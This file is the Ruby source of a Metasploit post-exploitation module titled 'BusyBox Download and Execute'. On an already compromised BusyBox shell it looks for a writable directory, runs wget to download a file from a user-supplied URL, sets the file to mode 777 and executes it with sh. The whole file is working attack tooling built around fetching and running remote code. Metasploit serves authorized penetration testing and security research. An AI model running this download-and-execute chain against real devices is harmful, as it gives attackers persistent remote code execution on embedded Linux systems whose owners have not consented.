metasploit-framework/modules/post/linux/busybox/wget_exec.rb

55 lines
1.6 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::BusyBox
def initialize
super(
'Name' => 'BusyBox Download and Execute',
'Description' => %q{
This module will be applied on a session connected to a BusyBox shell. It will use wget to
download and execute a file from the device running BusyBox.
},
'Author' => 'Javier Vicente Vallejo',
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'SessionTypes' => ['shell']
)
register_options(
[
OptString.new('URL', [true, 'Full URL of file to download'])
], self.class)
end
def run
print_status('Searching a writable directory...')
writable_directory = busy_box_writable_dir
if writable_directory
print_status('Writable directory found, downloading file...')
random_file_path = "#{writable_directory}#{Rex::Text.rand_text_alpha(16)}"
cmd_exec("wget -O #{random_file_path} #{datastore['URL']}")
Rex::sleep(0.1)
if busy_box_file_exist?(random_file_path)
print_good('File downloaded, executing...')
cmd_exec("chmod 777 #{random_file_path}")
Rex::sleep(0.1)
res = cmd_exec("sh #{random_file_path}")
vprint_status(res)
else
print_error('Unable to download file')
end
else
print_error('Writable directory not found')
end
end
end